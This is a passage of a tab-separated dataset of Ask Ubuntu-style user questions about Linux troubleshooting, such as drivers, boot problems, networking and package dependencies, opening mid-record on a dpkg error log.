version of libtasn1-3 on system is 2.10-1ubuntu1.1 . dpkg : error processing libgnutls26 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libimobiledevice-dev : libimobiledevice-dev depends on libimobiledevice3 ( = 1.1.4-1ubuntu6.2 ) ; however : package libimobiledevice3 is not configured yet . libimobiledevice-dev depends on libplist-dev ; however : package libplist-dev is not installed . libimobiledevice-dev depends on libtasn1-3-dev ; however : package libtasn1-3-dev is not configured yet . dpkg : error processing libimobiledevice-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnutls-dev : libgnutls-dev depends on libgnutls26 ( = 2.12.23-1ubuntu1.1 ) ; however : package libgnutls26 is not configured yet . libgnutls-dev depends on libgnutls-openssl27 ( = 2.12.23-1ubuntu1.1 ) ; however : package libgnutls-openssl27 is not installed . libgnutls-dev depends on libgcrypt11-dev ( > = 1.4.0 ) ; however : package libgcrypt11-dev is not installed . libgnutls-dev depends on libtasn1-3-dev ( > = 2.14 ) ; however : package libtasn1-3-dev is not configured yet . dpkg : error processing libgnutls-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libglib2.0-dev : libglib2.0-dev depends on libglib2.0-bin ( = 2.36.0-1ubuntu2 ) ; however : version of libglib2.0-bin on system is 2.32.3-0ubuntu1 . libglib2.0-dev depends on libpcre3-dev ( > = 1:8.31 ) ; however : package libpcre3-dev is not installed . libglib2.0-dev depends on pkg-config ( > = 0.16.0 ) ; however : package pkg-config is not installed . dpkg : error processing libglib2.0-dev ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnutlsxx27 : libgnutlsxx27 depends on libgnutls26 ( = 2.12.23-1ubuntu1.1 ) ; however : package libgnutls26 is not configured yet . dpkg : error processing libgnutlsxx27 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of glib-networking : glib-networking depends on libgnutls26 ( > = 2.12.6.1-0 ) ; however : package libgnutls26 is not configured yet . libglib2.0-0 ( 2.36.0-1ubuntu2 ) breaks glib-networking ( < < 2.33.12 ) and is installed . version of glib-networking to be configured is 2.32.1-1ubuntu2 . dpkg : error processing glib-networking ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python-gi libimobiledevice3 libtasn1-3-dev libimobiledevice-utils libtasn1-3-bin libgnutls26 libimobiledevice-dev libgnutls-dev libglib2.0-dev libgnutlsxx27 glib-networking
376604	stop ubuntu discovering printers	i have my machine connected to a large university network which means that ubuntu has filled up my printers with other people 's printers automatically ( mostly macbooks sharing their printers ) . this is irritating when i just want to print to the printers i 've explicitly added but there are now lots and lots of printers in the list . how can i stop this behaviour ? i 've already unticked view > > discovered printers .
376606	jdeveloper wo n't run on 64-bit ubuntu	after installing jdeveloper 11.1.1.6.0 on 64-bit ubuntu 12.04 , it refuses to start . it says it ca n't find libxext.so.6 . i can see that libxext.so.6 does exist on the machine . making a symlink to it in jdeveloper 's own lib directory does n't work because it 's a 64-bit library , and jdeveloper is set up as 32-bit . how can we get the needed library installed so jdeveloper can run ?
376607	problems installing ubuntu 13.10 alongside windows 7 - gpart shows unallocated space	i 've searched for people with similar problems but none of the fixes seem to be working for me . i have a windows 7 ( 200gb + 100mb reserved partitions ) and the rest ( ~800gb ) as unallocated . this is how it 's represented in windows and minipartitionwizard/easybcd , both of which i have used ( as advised elsewhere ) to edit/repair the partitions and attempt to repair the mbr . when i boot from the 13.1 live-usb and view the disk with gparted i get this prompt : /dev/sda contains gpt signatures , indicating that it has a gpt table . however it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that doesn't understand gpt partiotn tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? both y & n have the same results of showing the disk as completely unallocated , though . if i say no , i get the additional error no partition table found on device /dev/sda if i try and create a new partition , which is expected . in terminal sudo parted -l throws the same error . i 've tried reinstalling windows several times , even if i do n't change the partitions at all the windows installation does n't show in gparted . am i missing something here ?
376612	asus laptop nvidia 319 driver 12.04lts no external monitor	i recently purchased an asus 1215n laptop which features the nvidia ion graphics . the 319 driver installs automatically and works good except when i try to enable the external monitor ( which i intend to use unless i 'm away from home ) through the nvidia settings manager . if i switch the monitor to the hdmi port from the vga port , nvidia recognises it , but when i try to enable it and save to xorg.conf i get an error . when i reboot the pc does not load up ubuntu fully , i try to go graphics safe mode but fails . i have successfully uninstalled the nvidia driver by doing a : sudo apt-get remove -- purge nvidia-* sudo apt-get install ubuntu-desktop everything works fine now , but the pc struggles streaming even with low quality video with the nouveau driver , which is completely unacceptable . anybody have a suggestion ?
376615	how to run more then one process through terminal	i am having some trouble in starting more then one process in a single terminal window.. like as i have started wvdial by sudo wvdial it shows all initiating process details but wont give back pankaj @ n5010 : ~ $ until i press ctrl+c to terminate which causes terminate wvdial.. what i want is to start both wvdial and nautilus in same terminal window.is it possible ? ?
376619	unable to install ubuntu on toshiba m50d-a-103 , amd a6-5200	i am trying to install ubuntu on my new toshiba notebook but can not get past the first steps of booting . i try to install 13.10 ( 64-bit ) from usb , the result is always the same : i get to the black screen letting me choose to try or install ubuntu ( which , as i read , tells me i am in uefi mode , which i should be , since there is already windows 8 installed ) . however , booting always stops after a few lines and i get a black screen with nothing happening anymore . everything happens very fast and i ca n't even read the last lines before the screen goes black . i have tried to change the boot options , removing quiet splash and adding nomodeset acpi=off nolapic no splash ( according to some suggestions i found googling ) . in that way i can at least read the last messages before the booting stops : ata1.00 : qc timeout ( cmd 0xec ) ata1.00 : failed to identify ( i/o error , err_mask=0x4 ) ata1 : limiting sata link speed to1.5 gbps ata1 : sata link up 1.5 gbps ( sstatus 113 scontrol 310 ) then after a delay busybox starts and i get the message : ( initramfs ) unable to find medium containing a live file system i am quite desperate already and would appreciate any suggestions on what this could relate to and how to solve it .
376621	setting up a mail server in ubuntu server 12.04	i 've looked , read , searched , but nothing has helped so far . i would like to set up a mail server under my ubuntu server . how exactly do i get started ? i have webmin installed , as well as bind dns , postfix , and dovecot . again , i know about all the various help documents on ubuntu and around the web . i want to interact with a live person ( s ) because the other stuff has n't worked .
376633	why ca n't i find any tutorial for unity scope and python for ubuntu 13.10 ?	has the support for the python language been removed from the sdk in ubuntu 13.10 ? i ca n't find any tutorial for the unity scope and for python .
376637	web proxy setting config check	i am working on a new ubuntu server which i have no clue about their previous settings at all . how can i check there is a web proxy server setting on server ? i am using putty to ssh to server in terminal mode . thanks al
376638	usb soundcard resets when no sound is played	my usb sound interface ( m-audio fast track ultra 8r ) works fine but when i stop playing sound it seems to `` shut down '' after about 5 seconds ( green lights pop up which happens on windows only if you start the device - and i get a huge sound pop which is quite annoying ) . once i start a sound after it has `` shut down '' , the same problem reoccurs ( like it 's `` booting up '' ) . it seems almost as if the driver tells the device to shut down due to no sound played . is there a way to fix this ? here 's some output : $ for d in /sys/bus/usb/devices/ [ 0-9 ] * ; do if [ [ -e $ d/product ] ] ; then echo -e `` `basename $ d`\t`cat $ d/power/control`\t`cat $ d/speed`\t`cat $ d/product` '' ; fi ; done 1-1.4.1.1 on 480 ultra fast media reader 1-1.4.1.2 on 12 razer deathadder 1-1.4.1.3 auto 480 usb2.0 hub 1-1.4.1.3.1 on 1.5 g110 g-keys 1-1.4.1.3.3 on 1.5 gaming keyboard g110 1-1.4.3 on 12 hua xing 2-1.5 on 480 fast track ultra 8r $ cat /sys/bus/usb/devices/2-1.5/power/control on $ cat /sys/bus/usb/devices/2-1.5/power/level on $ cat /sys/bus/usb/devices/2-1.5/power/autosuspend_delay_ms 2000 $ cat /sys/bus/usb/devices/2-1.5/power/autosuspend 2 $ cat /sys/module/usbcore/parameters/autosuspend 2 $ cat /sys/module/usbcore/parameters/autosuspend 2 cat /lib/udev/rules.d/42-usb-hid-pm.rules # do not edit this file , it will be overwritten on update # # enable autosuspend for qemu emulated usb hid devices # note that there are buggy qemu versions which advertise remote # wakeup support but do n't actually implement it correctly . this # is the reason why we need a match for the serial number here . # the serial number `` 42 '' is used to tag the implementations where # remote wakeup is working . action== '' add '' , subsystem== '' usb '' , attr { product } == '' qemu usb mouse '' , attr { serial } == '' 42 '' , test== '' power/control '' , attr { power/control } = '' auto '' action== '' add '' , subsystem== '' usb '' , attr { product } == '' qemu usb tablet '' , attr { serial } == '' 42 '' , test== '' power/control '' , attr { power/control } = '' auto '' action== '' add '' , subsystem== '' usb '' , attr { product } == '' qemu usb keyboard '' , attr { serial } == '' 42 '' , test== '' power/control '' , attr { power/control } = '' auto '' # catch-all for avocent hid devices . keyed off interface in order to only # trigger on hid class devices . action== '' add '' , subsystem== '' usb '' , attrs { idvendor } == '' 0624 '' , attr { binterfaceclass } == '' 03 '' , test== '' ../power/control '' , attr { ../power/control } = '' auto '' # dell drac 4 action== '' add '' , subsystem== '' usb '' , attr { idvendor } == '' 413c '' , attr { idproduct } == '' 2500 '' , test== '' power/control '' , attr { power/control } = '' auto '' # dell drac 5 action== '' add '' , subsystem== '' usb '' , attr { idvendor } == '' 413c '' , attr { idproduct } == '' 0000 '' , test== '' power/control '' , attr { power/control } = '' auto '' # ibm remote access action== '' add '' , subsystem== '' usb '' , attr { idvendor } == '' 04b3 '' , attr { idproduct } == '' 4001 '' , test== '' power/control '' , attr { power/control } = '' auto '' action== '' add '' , subsystem== '' usb '' , attr { idvendor } == '' 04b3 '' , attr { idproduct } == '' 4002 '' , test== '' power/control '' , attr { power/control } = '' auto '' action== '' add '' , subsystem== '' usb '' , attrs { idvendor } == '' 04b3 '' , attr { idproduct } == '' 4012 '' , test== '' power/control '' , attr { power/control } = '' auto '' # raritan computer , inc kvm . action== '' add '' , subsystem== '' usb '' , attr { idvendor } == '' 14dd '' , attr { idproduct } == '' 0002 '' , test== '' power/control '' , attr { power/control } = '' auto '' # usb hid devices that are internal to the machine should also be safe to autosuspend action== '' add '' , subsystem== '' usb '' , subsystems== '' usb '' , attrs { removable } == '' removable '' , goto= '' usb_hid_pm_end '' action== '' add '' , subsystem== '' usb '' , subsystems== '' usb '' , attrs { removable } == '' unknown '' , goto= '' usb_hid_pm_end '' action== '' add '' , subsystem== '' usb '' , attr { binterfaceclass } == '' 03 '' , attrs { removable } == '' fixed '' , test== '' ../power/control '' , attr { ../power/control } = '' auto '' label= '' usb_hid_pm_end '' note that laptop-mode is not installed , it 's a desktop pc with a fresh ubuntu 13.10 install .
376640	fan in lenovo z580	i am running ubuntu 13.10 on a lenovo z580 and the fan is constantly running . i tried to follow the steps outlined here : how to control fan speed ? ... but apparently the `` fancontrol '' does n't recognize my fan . i guess the fan is unsupported . does anyone have any suggestions as to how i can control the fan behaviour ? thanks in advance .
376642	problem formatting bless output	i 've been trying to output a standard hex dump of a binary file using bless hex editor . the formatting language provided works fine until i try to get an ascii column down the right hand side . all i get is as if i use an upper case a or blank spaces if i use a lower case a . the pattern i have entered is : [ % o % : % e '' 16 '' x '' `` % ] | % e '' 16 '' t '' a '' % \n its the a near the end which is the problem - if i change it for an h for hex it shows the hex in the right hand column ok , it just does n't seem to like printing ascii characters . has anyone else found this , or am i missing something ?
376643	problems with ati v9800	i just installed 12.04.1 to dell r5500 workstation . the video card i am using is the ati v9800 . after the reboot the display is fragmented and i am unable to read the desktop . has anyone seen this problem before and any suggestion on how to fix it ?
376648	accessing files from another partition	i 've been using windows for some time and i 've just installed ubuntu and would like to make available some of the media files ( mostly my itunes songs and movies ) to my ubuntu partition . my question is , is there an easy way to just copy them over in ubuntu ( i noticed that the other partition is available through a mount in /media ) ? i tried ~ $ sudo cp /movies /home/jesse/ and i got omitted /movies is there any easy way to do this , or do i have to shimmy everything in my dropbox ?
376649	huawei e173 modem always need a restart to get detected	i have just installed ubuntu 13.04 saucy . i 'm using a huawei e173 usb data card . it has a problem about detection on ubuntu . it does n't detect when i connect it after login to ubuntu . but if i connect it and then start the pc it works well . it shows as a mobile broadband connection in network menu . same as if i remove it from the usb slot and connect , it wo n't show any more . let me know if anyone knows how to fix it .
376654	stuck in grub terminal after installing ubuntu 12.04	okay guys , i am trying to install ubuntu 2 days already alongside my windows 8 . after i finally installed ubuntu 12.04lts i tried to reboot but i was put into : error : file not found grub rescue > _ now i googled this and made some commands via live usb and now i am in another screen when turn on my asus laptop : minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > this thing appears 3 seconds after turning pc on , so i ca n't enter neither windows , nor my freshly installed linux , i can only write commands here or use ubuntu vis live usb . i literally read and tried every single thing i found on google , but nothing worked , do you have an idea how can i fix this ?
376661	how to get nvidia driver installed on 13.10	i found severel links , butnothing works . i tried system configuration to install over frontend i always end up in a black screen nothing works please give advise peter schlaeger
376663	can not use cifs mount any more	i was comming from 11.04 and now i upgraded to 13.10 . but now my cifs mount does not work any more please give advice peter schlaeger by the way : i new version should be a progress and not producing more trouble as we had in the past ! ! ! ! !
376667	xubuntu 13.10 wi-fi network dropping	i just installed xubuntu 13.10 and i am experiencing some odd behavior on my laptop . occasionally with no predictable pattern xubuntu will not be able to find my wi-fi network . specifically the one i was connected to . all other networks in the area still show up . when i disable wireless and enable it again it always finds it without issue , so it 's not a crucial issue , but still i have to watch after it like a hawk and i 'd rather not go through all the trouble . it 's a dirt-old gateway , lspci tells me that the ethernet controller is intel corporation pro/100 ve network connection ( rev 02 ) , the router is a netgear n600 wireless dual band gigabit router . any help would be awesome . update : fixed , but i ca n't answer my own question cause i 'm new here but here goes : so after more searching i found out that my particular problem was with network manager . i installed wicd and now my connection is n't dropping anymore . however it came with it 's own can of worms as linux fixes are wont to do . i had to purge network manager after installing wicd , which was fine , but then wicd would n't start until i deleted the link to resolv.conf in /etc/ and copied the file found in /run/resolvconf/resolv.conf into /etc/ . for whatever reason the link was not enough . then i was golden . hope this fixes similar problems for you guys .
376668	how do i recover my data ( e-mail , documents , etc . ) after reinstalling ubuntu ?	after an automatic update , my computer would not boot , so i reinstalled ubuntu from an optical disc ( ubuntu 12.10 ) . this happened about a month ago ; i had the most recent update . installation instructions gave me the choice of getting the latest update online but said that if i got the latest update , i might lose my data , so i chose 12.10 . however , my old data did not show up . how can i access it ?
376669	how to delete this file ?	i am trying to create a directory .ebextensions . ubuntu 12.04 is telling me that there is already a file with that name ; however , i have searched for it , and nothing comes up . i really need to create that directory asap . what should i do ?
376670	access files on iphone 4s from ubuntu ?	i have an iphone 4s with ios7 . when i plug in my iphone on ubuntu 13.10 , the window says my phone is locked and i cant access the files . i push `` trust '' computer on my phone and it just keeps popping up over and over again , but it never unlocks on ubuntu so i ca n't access my files that are on my phone . please help !
376674	something is resetting sound mixer controls	sometimes ( several times an hour , maybe ) i suddenly find that my mixer controls are reset to quite unconvenient values . i’m running alsa and controlling everything with alsamixer . there’s also kmix running , but killing it doesn’t solve the problem . this has no visible connection to what happens in the system . some things , such as skype , make the resets more frequent , but it’s only a weak correlation in frequency , not happening together with other events . how can i trace this ?
376675	is my folder encrypted ?	i have 12.04 server with encrypted /home directory . i moved 50gb /xx folder from my root directory to my home directory /home/xx it did this instantly . the question is : is that /home/xx now encrypted ? the reason i am asking this is that it only took a second for my server to copy ( mv ) this 50gb xx directory to my home folder so i am scared that it copied only and it did not encrypt because it was done right away , there was no time spent encrypting , unless its done on the fly .
376676	turn off wifi when lid is closed	i use xubuntu 12.10 . when i close my laptop lid , it goes to standby but , the wifi light stays on . when in windows , wifi is turned off when lid is closed without any problem/configuration . how do i allow ubuntu to turn off wifi when the lid is closed ? p.s . i ran iwconfig . it shows that power management for wlan0 is off .
376677	never wrote password when setting up crouton on chromebook , how do i set it up ?	since it never showed anything as much as i typed , i thought it was a bug so i just pressed enter 3 times until it let me set up my account without a password . but now i want to run unity from sudo and it wo n't let me . any ideas ?
376681	is there a way to access a live command shell for ubuntu server online ?	i have setup a lamp server with ubuntu server that i plan to do some game hosting with . right now i am using webmin for remoting in to my server . one major problem with webmin however , is that you can only enter one command into the command shell and are unable to use editors such as nano or vim through it . i would really like a live , responsive , command shell so i can work on my server where ever i am .
376682	how do i repair lightdm to login to plasma-workspace on kde 4.11.3/kubuntu 13.10 ?	after an upgrade to kde 4.11.3 , my kubuntu 13.10 ceased to login to kde . there would be a login loop ( login , black screen , return to lightdm login ) . i did attempt to go over other solutions such as fixing ~/.xauthority , ~/.kde moving , changing permissions in my home folder to my own , there was no resolution . i tried to see if i could try to login as another user , and i created one and attempted it . the issue still existed . so it was n't directly due to my user thereby . my next try was to see if there was a workspace issue with kde 's upgrade . i tried to login with the session set to `` compiz-fusion '' . this let me login to the desktop but i had to execute `` kwin -- replace '' to get my desktop back to normal . after repeated attempts at logouts an logins , this is the only workaround i have until i can find the culprit . i just want to directly login to my kde plasma workspace and not have to manually start kwin and/or plasma/desktop .
376684	how to use ffmpeg to convert ape file to mp3 file ?	i am trying to use ffmpeg on ubuntu 13.10 to convert a ap3 file to mp3 file ? i install ffmpeg , but i get this error when i use it . please tell me how can i fix it ? thank you . $ ffmpeg -i cd1_age_0-3_baby.ape cd1_age_0-3_baby.mp3 ffmpeg version 0.8.9-6:0.8.9-0ubuntu0.13.10.1 , copyright ( c ) 2000-2013 the libav developers built on nov 9 2013 19:15:22 with gcc 4.8.1 *** this program is deprecated *** this program is only provided for compatibility and will be removed in a future release . please use avconv instead . input # 0 , ape , from 'cd1_age_0-3_baby.ape ' : metadata : album : mozart effect i - enlightment title : c : \ [ ape set ] ī����чӧ-�������ǵ����� 4cds\cdimage01 genre : classical year : 2002 comment : exact audio copy duration : 01:09:17.75 , start : 0.000000 , bitrate : 656 kb/s stream # 0.0 : audio : ape , 44100 hz , stereo , s16 output # 0 , mp3 , to 'cd1_age_0-3_baby.mp3 ' : stream # 0.0 : audio : [ 0 ] [ 0 ] [ 0 ] [ 0 ] / 0x0000 , 44100 hz , stereo , s16 , 200 kb/s stream mapping : stream # 0.0 - > # 0.0 encoder ( codec id 86017 ) not found for output stream # 0.0
376688	newbee question : attempting to install ubuntu server + unity to get a gui of server configuration	my objective is to get a graphical desktop of the ubuntu server services ( apachee , sql , dhcp , and similar services ) . ideally i should be able to configure these services through a gui . i have installed ubuntu server 12.04.3 with amp options . i have also installed the unit-desktop . it appears that when i installed the ubuntu-desktop but now it just looks like a ubunto-desktop system . at some point i will learn all of the cli but in the interim i am trying to get some things running quickly . any assistance is appreciated . mark
376692	usb keyboard with ubuntu server 13.10	my old zboard is n't working with ubuntu server 13.10. i 've searched askubuntu and google but cant find a fix . does any of you ever had this problem ? i cant plug an old keyboard with ps/2 connection in it . i do have a spare wireless keyboard , but that doesnt seem to work . edit : the keyboards work with my other pc . i geuss its an acer problem ? its an old acer laptop ... . aspire 7535. ill try flash the bios
376695	multimode mouse - configure extra buttons	i have this mouse http : //a4tech.com/w_product.asp ? cid=215 & scid= & id=728 . it has different modes for which you can configure the buttons . is there any application ( preferably with ui ) to do this in ubuntu ( preferably 13.10 ) ?
376708	inherit group permissions from parent folder	i know there are a lot of posts related to this one , but any of the answers is usefull to me . i need to share a folder with other user . we should be able to create , edit and remove each other files 's . but i do n't want to use umask or acl . we are in a cluster so we ca n't really mess around too much , we do n't have permissions to apt-get or anything like it . i tryed to make it work only with setgid but i was n't successfull . ( the group is inherited , but the permissions are not ) how can i make this work with all these limitations ?
376709	netflix website `` server not found '' firefox and chrome	i have recently become unable to access the netflix website on either firefox or chrome . i am using ubuntu 13.04 . i do not have netflix-desktop installed , i am just trying to update my queue and such . i have clear history , cache and cookies to no avail . this has been going on for several days , does not seem to be an issue on windows pc at another location ... i guess i need to try the ubuntu laptop at some other wifi spot ... anyone have recommendations to resolve ?
376710	live usb for ubuntu 13.10 does't recognize windows 8 os	i have created a live usb for ubuntu 13.10 64 bit using universal-usb-installer-1.9.4.4 i have restarted and booted from the usb ; tried ubuntu without installing . everything works fine there including web browsing , videos , installing new software etc . so i decide to install ubuntu as dual boot option to windows 8 . when i tried installing , the options do not show the existing windows 8 os . it shows only the option to install ubuntu as standalone os . the step by step installation instructions available online mention that it should show option like `` install ubuntu alongside windows 8 '' i have a dell inspiron 3521 with windows 8 ; uefi boot . i have 3 options for the boot menu : `` uefi security boot on '' , `` uefi security boot off '' and `` legacy boot '' . please advise how i can get to dual boot windows 8 and ubuntu . i know that usb setup is good as i am able to boot and try from it without installing . may be boot settings ? thanks in advance ! ~kk
376713	unable to enter passphrase for encyption	i have just installed 13.10 and am unable to enter the passphrase for the cryptsetup , it does not seem to recognise the keyboard , but works perfectly fine on the gnb grub screen before hand any help would be much appreciated .
376715	ubuntu 13.10 no option to install to usb	do not want to dual boot or clean install on pc . want usb boot option . downloaded iso image but installer does not start or offer usb install option suggestions ?
376716	dell inspiron 5721 17r turn wireless led off	not long ago i bought dell inspiron 5721 17r with ubuntu 12.04 came with laptop . does not contain wifi hardware swich or i have not found it yet during exams use of wireless is prohibited . laptops are checks with wifi led . looking for a way to turn off wifi led using os ? sudo ifconfig wlan0 down disconnects and connects wifi again http : //www.technowriter.net/2012/09/how-to-enable-and-disable-wireless-card.html also does not turn off led
376717	how to set up a linux server as a router	motivation : i want to use my linux server instead of the average wireless router for several reasons i want to learn how to set up a more complete server on linux i do n't want to have a modem , connected to a router , connected to a network switch i am sick and tired of having to unplug my router every 10 days because it just hangs i am sick and tired of buying routers only to realize they are missing something crucial , like port forwarding or static ip addressing ( dhcp ) set up : ultimately , the connection will come into a modem , and straight into my server through eth0 , then eth1 will output to a network switch which all other client computers will connect to via ethernet cables ( forget wireless for the moment ) . currently , however , i am in an office building , and i have the connection coming into a modem , which goes into a router , which goes into a network switch , which then goes into eth0 as specified above . current tutorials : i looked at some tutorials ( ubuntu tutorial is the best one ) , and i have looked at some of the router questions here ( ie . this one ) , but they all gloss over several key concepts , like : what is eth1 's relation to eth0 ? in /etc/network/interfaces do i have to tell eth1 to use eth0 as the network ( generally it is the actual physical router address ) ? do i have to do anything to instruct eth1 to take the internet that comes into eth0 and pass it onto whoever wants it in the network switch ? current approach : here is my /etc/network/interfaces file on the server : iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.1.70 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 gateway 192.168.1.1 dns-nameservers 8.8.8.8 auto eth1 # iface eth1 inet dhcp iface eth1 inet static address 192.168.7.0 netmask 255.255.255.0 broadcast 192.168.1.255 network 192.168.1.0 and ifconfig tells me that both nics are working fine : eth0 link encap : ethernet hwaddr 20 : cf:30:55 : a0:5f inet addr:192.168.1.70 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :22cf:30ff : fe55 : a05f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11297 errors:0 dropped:0 overruns:0 frame:0 tx packets:16639 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:948633 ( 948.6 kb ) tx bytes:1274685 ( 1.2 mb ) eth1 link encap : ethernet hwaddr 00:11:95 : f7 : f4:6d inet addr:192.168.7.0 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :211:95ff : fef7 : f46d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:243 errors:0 dropped:0 overruns:0 frame:0 tx packets:3231 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:29934 ( 29.9 kb ) tx bytes:213055 ( 213.0 kb ) interrupt:21 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:5348 errors:0 dropped:0 overruns:0 frame:0 tx packets:5348 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:470737 ( 470.7 kb ) tx bytes:470737 ( 470.7 kb ) wlan0 link encap : ethernet hwaddr bc : f6:85 : f8:70:5c up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) and here is what route -n returns on the server : destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth1 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.7.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 then on the client i have auto lo iface lo inet loopback iface eth0 inet dhcp but it is not being assigned an ip address . edit : here is the isc-dhcp-server configuration file located at /etc/dhcp3/dhcpd.con which i copied mostly from this site . # sample /etc/dhcpd.conf # ( add your comments here ) default-lease-time 600 ; max-lease-time 7200 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.1.255 ; option routers 192.168.1.254 ; option domain-name-servers 192.168.1.1 , 192.168.1.2 ; option domain-name `` mydomain.example '' ; subnet 192.168.7.0 netmask 255.255.255.0 { range 192.168.7.10 192.168.7.25 ; } edit : output of sudo iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy drop ) target prot opt source destination accept all -- anywhere anywhere ctstate related , established accept all -- anywhere anywhere log all -- anywhere anywhere log level warning chain output ( policy accept ) target prot opt source destination question : what crucial steps/components am i missing in this setup ?
376718	dependency out of sync ( later version than required )	i am trying to run apt-get dist-upgrade ( also when running apt-get install zip ) but i get an error message that says : the following packages have unmet dependencies : linux-server : depends : linux-headers-server ( = 3.2.0.38.46 ) but 3.2.0.39.47 is installed e : unmet dependencies . try using -f. my question ( s ) : what is linux-headers-server . how is it possible to have a later version of linux-headers-servers but it cant upgrade ? will -f cause things to horribly break ? thanks in advance
376720	`` system program problem detected '' on login	i changed from window 7 because it has been hacked twice to ubuntu and have been told that this program can not been hacked . after a sales person has installed ubuntu i opened my computer for the first time and i got the message `` system program problem detected '' . i wanted to report the problem but they asked me for a password and i did not know the password . so i carried on and it worked okay for me . today - second day - again the same message than above `` system ... '' the program has been hacked and someone has changed the writing - the letters are much smaller than before . my question is how can i solve the problem which has been detected ? can someone hack ubuntu if it is not properly installed ?
376724	ubuntu 13.04 , how to upgrade to gnome 3.8.x	i 'd like to update gnome but i do n't want 3.10 until a few extensions i use are updated . can i specify a version to update with apt-get ?
376726	distributing automounter maps to nis clients	i am working to get automounter maps distributed to our group 's workstations via nis . all the workstations are clients , with one master server . is it possible to distribute automounter maps through nis to clients , or can this only be done to nis slaves ?
376731	how to restart teamviewer daemon from a bash script ?	i 've installed tv as a server on a ubuntu 12.04 box running 24/7 . unfortunately , the daemon service sometimes bugs and disconnects . i can fix this at the terminal with : sudo teamviewer -- daemon < stop/start > but this requires local access to the server , which is not always possible . i could make a script to periodically check ( start and stop ) the service , but i do not know how to issue a sudo command within the script . can anyone help ? thanks !
376732	thinkpad t440p wireless network controller	i have a thinkpad t440p with realtek 818b as wireless network controller . is there any device driver available for this controller ? if there is not , which other realtek wifi network controllers are similar to this one , with source code , so that i can try to make one ? lspci -nn | grep 0280 04:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. device [ 10ec:818b ]
376736	copy date and time of kde calender in text format to clipboard	is there a way to set a shortcut-key for copying a text format of current date and time of kde environment 's calender ?
376739	problems with ethernet connection with ubuntu 13.04 , msi ge70-2oe	if someone could help me solve the problem with the internet connection . my computer is msi brand , and when i changed operating system ( from windows to ubuntu ) , leave to detect cable internet , if it detects the wireless .
376740	availability for htc phones	will this be available for htc vivid ( at & t ) as maybe a universal rom ?
376742	samsung series 9 battery time indicator keeps changing and keyboard light not working	i have a samsung series 9 laptop currently with ubuntu 13.04 on it . unfortunately there are some issues i am having with it and was wanting to see if anyone had an answer as to a fix . -first , my battery time left indicator keeps shifting from time to time , for example it will tell me i have 3:02 of battery time left and then it will say that i have 4 hours left of time left to use my laptop . -second , the keyboard backlight does not work and i already followed the guide someone else had posted to fix it . all i get is a bar in the right saying that the backlight is on but there is not a backlight on . if anyone has a solution to fix these problems please let me know quick ! !
376743	how to convert a video to avi xvid with custom frame size ?	i want to convert my movies to avi xvid with the frame size 700x292 so that i can watch it on my tv.but i do n't know which software in ubuntu will help me.i tried arista transcoder but it does not have the option to resize the frame .
376746	running the live dvd with windows 8	i want to try ubuntu with the live dvd , but for the life of me i ca n't figure out how to get my computer to boot from the dvd . i have an asus n56vz that came with windows 8 pre-installed . i 've been in the bios ( or is it uefi ) and i only see one option for boot . i tried creating a new one , but either i did n't do it right or it just still did n't work .
376747	how do i debug an x-terminal-emulator that fails to start ?	i am trying to start a terminal window in openbox . however , the window never pops up . i tried to execute $ x-terminal-emulator $ echo $ ? 1 the same happens if i try to run gnome-terminal . there is no output . however , this runs perfectly well under xfce4 . where is the output of this logged ? how can i fix this ? added later : the problem does not exist when i do sudo startx to start openbox . how do i get gnome-terminal work as me ?
376752	new os and webcam black and white only ?	i have a lenovo thinkpad edge e520 ( 1143 ) which i bought without an operating system . back then i installed windows vista and then ubuntu ... i do n't remember exactly in which os i did it , but i changed my camera in skype to black and white , because i wanted it that way . then i updated to win8 and then updated to ubuntu 12.04 . i still use both now . to my surprise , the webcam is still black and white and i ca n't change that back . on ubuntu : in the skype/options/video dialogue i see no way to manipulate the color of the image . in the 'system settings ' i see no camera icon ... in 'system settings'/color i see the 'chicony electronics-webcam ' listed with the tag uncalibrated . when i try to calibrate it , i realize i have no 'calibration target ' ... i 've now installed the 'v4l2 ' package and i 'm stuck again . now i have tried the 'video4linux control panel ' also without results ... ideas ?
